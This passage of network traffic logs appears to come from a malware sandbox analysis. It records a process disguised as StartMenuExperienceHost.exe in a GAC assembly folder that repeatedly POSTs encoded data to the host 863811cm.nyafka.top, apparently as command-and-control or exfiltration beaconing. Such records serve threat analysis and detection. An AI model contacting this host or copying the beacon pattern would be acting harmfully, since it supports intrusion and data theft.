                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:33.831512928 CEST2584OUTData Raw: 55 5d 5d 5d 54 58 58 5e 5e 5a 55 58 51 56 5a 5a 57 50 58 5f 55 5d 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]]TXX^^ZUXQVZZWPX_U]QZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<.#>9'%,A<?"?3=U4$P&=*)G!<Z*+#Y$/\*-
                                                                Oct 11, 2024 01:37:33.930896044 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:34.124502897 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3L8Rj4OZSjmisXwXzX2hDuiumZdtS0o8mKZNKHmt1mkJPTmn7r8TCs3ICWRzzD2evow9XpAWjveL6lf1MlweLf%2BVhSDaWvQ30XEVHfv6UU0cHWrPGG%2Fm%2B8ffMWSy%2FGhfZTaG1GMJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7062cdaa4308-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                99192.168.2.550080188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:33.572628975 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:33.925352097 CEST1984OUTData Raw: 50 5e 5d 55 54 5f 58 56 5e 5a 55 58 51 57 5a 59 57 58 58 5f 55 5d 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]UT_XV^ZUXQWZYWXX_U]QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?[4\+:;U%X<*%\"(<+0*#?'>)#58>;#Y$/\*)
                                                                Oct 11, 2024 01:37:34.039190054 CEST25INHTTP/1.1 100 Continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                100192.168.2.550081188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:34.261584044 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:34.614628077 CEST2004OUTData Raw: 55 5d 5d 5e 51 59 5d 51 5e 5a 55 58 51 5c 5a 5d 57 59 58 5c 55 5d 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]^QY]Q^ZUXQ\Z]WYX\U]Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?3<:0%;(5'!(0(V 4?V$-)W>;#!1/*;#Y$/\*
                                                                Oct 11, 2024 01:37:34.706573009 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:34.893657923 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FatdSO6RuS5wP34HWUbiWfjuaw%2BZLZjGkQ4kH9PZqKYMxiRt3X5YZlCIURm6mUPU2QQXfwNimzNUQuj5YYXe%2FD7d92LmklcidB1S9cmnBk%2Fp9YFIi7sel2jMqhe8DpS%2BDJOtEre0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70679b524386-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 3e 5f 32 56 20 00 01 10 2c 1f 0e 12 2a 04 31 01 3c 31 09 58 31 27 3f 17 39 02 2e 0d 36 2b 24 5e 3e 5a 31 03 30 12 38 03 3c 0b 2a 51 03 1b 39 5f 28 33 09 1e 3f 31 25 17 29 32 21 15 30 0a 29 40 2a 2e 35 12 24 58 31 01 35 0f 3c 53 2a 02 28 0e 38 3b 30 18 2a 38 2a 10 23 11 2a 5f 08 13 39 56 29 2b 3b 0d 22 19 0f 5c 21 3d 27 55 22 00 2a 1a 3f 29 39 0d 27 1d 30 5e 2f 0c 28 58 20 2f 33 57 23 2f 36 53 21 2d 3f 03 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>_2V ,*1<1X1'?9.6+$^>Z108<*Q9_(3?1%)2!0)@*.5$X15<S*(8;0*8*#*_9V)+;"\!='U"*?)9'0^/(X /3W#/6S!-?18"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                101192.168.2.550082188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:34.277053118 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:34.628381014 CEST2584OUTData Raw: 50 59 5d 5c 51 5b 58 53 5e 5a 55 58 51 5c 5a 5a 57 5e 58 5c 55 5d 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY]\Q[XS^ZUXQ\ZZW^X\U]QZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+=+/2(@?&(5+>47+V3=S>8/!,[(+#Y$/\*
                                                                Oct 11, 2024 01:37:34.720623016 CEST25INHTTP/1.1 100 Continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                102192.168.2.550083188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:35.010286093 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:35.362782001 CEST1992OUTData Raw: 55 5f 5d 59 54 5f 5d 55 5e 5a 55 58 51 55 5a 59 57 5e 58 5c 55 52 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]YT_]U^ZUXQUZYW^X\URQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+-4]?\<%B*&7!(<5V4$7W$[&*+8A51;);#Y$/\*-
                                                                Oct 11, 2024 01:37:35.453746080 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:35.758840084 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vc5MW0U8OnToMTpo2e6gLwscZN%2FU2OmdLxkO7d%2FCjeVnIgFiPOi6rps7X0c2CElGN%2Bnz98FoWi9TNuGZtuANqL5VEJQFdKo6MCh6KZ4P%2F%2BNv3bGPMLisI6krnb%2FZAfXJnT8QTLEp"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a706c4ee441ef-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 28 29 26 1d 23 10 33 59 2f 57 33 03 3e 2d 31 00 28 31 33 12 26 37 3b 5d 2e 02 3d 52 23 3b 09 06 29 5a 36 5f 27 3f 3b 59 3c 0b 2a 51 03 1b 3a 02 2b 30 2f 1c 2b 0c 2e 04 28 32 26 01 30 0d 21 44 3e 2d 3d 50 30 2e 21 06 36 21 0a 54 29 2c 30 0c 2f 15 3f 07 3d 38 22 59 37 3b 2a 5f 08 13 39 57 29 5e 3c 1d 35 0e 36 07 35 5b 3f 56 36 39 35 0b 3f 29 2a 50 33 0a 3b 00 3b 0b 34 59 21 2c 3f 1c 23 3c 26 1e 20 04 30 5c 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'()&#3Y/W3>-1(13&7;].=R#;)Z6_'?;Y<*Q:+0/+.(2&0!D>-=P0.!6!T),0/?=8"Y7;*_9W)^<565[?V695?)*P3;;4Y!,?#<& 0\&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                103192.168.2.550084188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:35.037646055 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:35.397185087 CEST2584OUTData Raw: 50 52 5d 5e 54 55 5d 53 5e 5a 55 58 51 52 5a 5d 57 51 58 5d 55 50 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]^TU]S^ZUXQRZ]WQX]UPQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<<]>:&8(C4^#;3?* /P0!T=<"1Y(;#Y$/\*
                                                                Oct 11, 2024 01:37:35.483346939 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:35.759321928 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:35.759366035 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1NGyuLCmsrnuQ%2Bmhcd68IfLJZaZ2VvACnBvsyfPySp3kqxOq8ci8mQaWA5shuRxJkl1U741yQVWTsA9fnRQFj0Qtg9VD2v3Fc4yJs9beUC73qNFTtSPwcS4TuWKydcDH2Hb5YF0a"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a706c7ab31978-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                104192.168.2.550085188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:35.869276047 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:36.222024918 CEST2004OUTData Raw: 50 5b 58 5e 54 55 58 55 5e 5a 55 58 51 52 5a 5b 57 5a 58 5d 55 57 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[X^TUXU^ZUXQRZ[WZX]UWQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<=0Z<*?R1=;?5;#?3&#'W3U=(8@6?=;#Y$/\*
                                                                Oct 11, 2024 01:37:36.312931061 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:36.602415085 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nRd02KfimIJkehtRoPMr31dGkxE%2BwjCtiPy8IteX6LH6iwfaI4og2j%2BNy7R5bOc%2B8PJCKAwDvlbqM8EpVBtQ02hIAyp0b88rc2z0QZZ2xoBVTayF08oXdmBJJQ6FBvGQLHADLvD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7071a9498c89-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 3e 39 31 0c 34 3e 37 58 2d 22 3b 03 2a 04 26 14 3f 1f 2f 12 26 24 1e 06 39 02 35 53 21 3b 28 17 29 3f 21 03 30 05 2c 01 29 21 2a 51 03 1b 39 12 2b 23 28 0e 28 31 2d 19 2b 21 3e 04 24 33 29 09 3d 13 25 50 27 00 03 07 22 22 20 56 29 5a 33 52 2d 2b 27 09 2a 16 2a 5b 21 3b 2a 5f 08 13 39 55 3d 06 05 0d 35 27 36 01 23 3d 38 0d 35 3a 3a 53 3d 29 0c 1e 27 0d 24 59 38 22 3c 58 37 01 30 08 22 3f 31 0c 34 2d 0e 11 27 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>914>7X-";*&?/&$95S!;()?!0,)!*Q9+#((1-+!>$3)=%P'"" V)Z3R-+'**[!;*_9U=5'6#=85::S=)'$Y8"<X70"?14-'("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                105192.168.2.550086188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:35.879349947 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:36.237591028 CEST2584OUTData Raw: 55 58 5d 5e 54 5b 58 52 5e 5a 55 58 51 5c 5a 59 57 50 58 5f 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]^T[XR^ZUXQ\ZYWPX_U\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<,<*&+6?!(36!7;0%S(8451'>#Y$/\*
                                                                Oct 11, 2024 01:37:36.325212955 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:36.575345039 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WHkMItrYfgoXAJJsUhcY7GxjZTgktlyGwYLT8PGCegmRyqk7bg3kXPhcg9xoyYANw9Agb%2BxyEPEKbpZr9X43vDx6H3WX74%2FjEByIyPAA897l6IHEFOCLnudBSkNGuPdLEi%2BRAiul"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7071b8ed8cc3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                106192.168.2.550087188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:36.707216978 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:37.065890074 CEST2584OUTData Raw: 50 5d 5d 5c 51 5b 5d 54 5e 5a 55 58 51 51 5a 59 57 51 58 59 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]]\Q[]T^ZUXQQZYWQXYU\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]<0<9/%(A<(\";$(0* $0>:)(@!1(+#Y$/\*1
                                                                Oct 11, 2024 01:37:37.153772116 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:37.403594971 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9Q1NEXcXP2AvOdmUcHYsCEvSZIgRV1eZeGjW4D9fld0Pj58jMUPc5Rtp1%2FbGAvMAjGT79AIgYu0q9yRy7oKbd34MIkgDlV68WzdWgZnZz6jSzVQJbChn1zO4O7WQfnAiC0XdrZD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7076e97d41cf-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                107192.168.2.550088188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:36.712845087 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:37.065814972 CEST2004OUTData Raw: 55 5a 58 5a 54 5c 5d 52 5e 5a 55 58 51 52 5a 5e 57 5c 58 5b 55 51 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZXZT\]R^ZUXQRZ^W\X[UQQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:([0>9?T'-<<3")#: 7;'=*(8G"1(Z);#Y$/\*
                                                                Oct 11, 2024 01:37:37.154635906 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:37.435340881 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJz1WwhRZXNvUkuSJO5uBty7H0%2FfibXD0dgakbuDqCssetdMCb9Tf3M1bk0jac5bIDyio16HvhSvzYTCTvuAKxsVuS3PHhsgrlvMGTusqgwz6u9UcvIFVi2i8SCkccR7%2Fl7zeZ8N"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7076ebd580d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 2a 2a 26 10 34 3d 33 58 2f 21 02 5f 3e 03 39 00 2b 57 30 03 26 27 27 5c 39 02 29 53 21 2b 20 5f 2a 3c 3d 03 24 02 0a 02 28 0b 2a 51 03 1b 39 5f 3f 0d 2f 1c 2b 22 3a 04 29 22 2e 01 24 0d 35 40 2a 3e 22 0c 33 3e 0c 59 35 0f 2b 0d 29 2f 27 10 2f 38 33 0a 29 38 2a 59 23 3b 2a 5f 08 13 3a 0d 3e 38 06 1c 35 09 0f 5e 35 03 23 10 36 3a 26 19 2a 29 22 1e 25 20 30 5d 2f 54 38 13 23 3f 37 55 22 2f 22 52 34 2d 0d 05 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y**&4=3X/!_>9+W0&''\9)S!+ _*<=$(*Q9_?/+":)".$5@*>"3>Y5+)/'/83)8*Y#;*_:>85^5#6:&*)"% 0]/T8#?7U"/"R4-%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                108192.168.2.550090188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:37.590980053 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
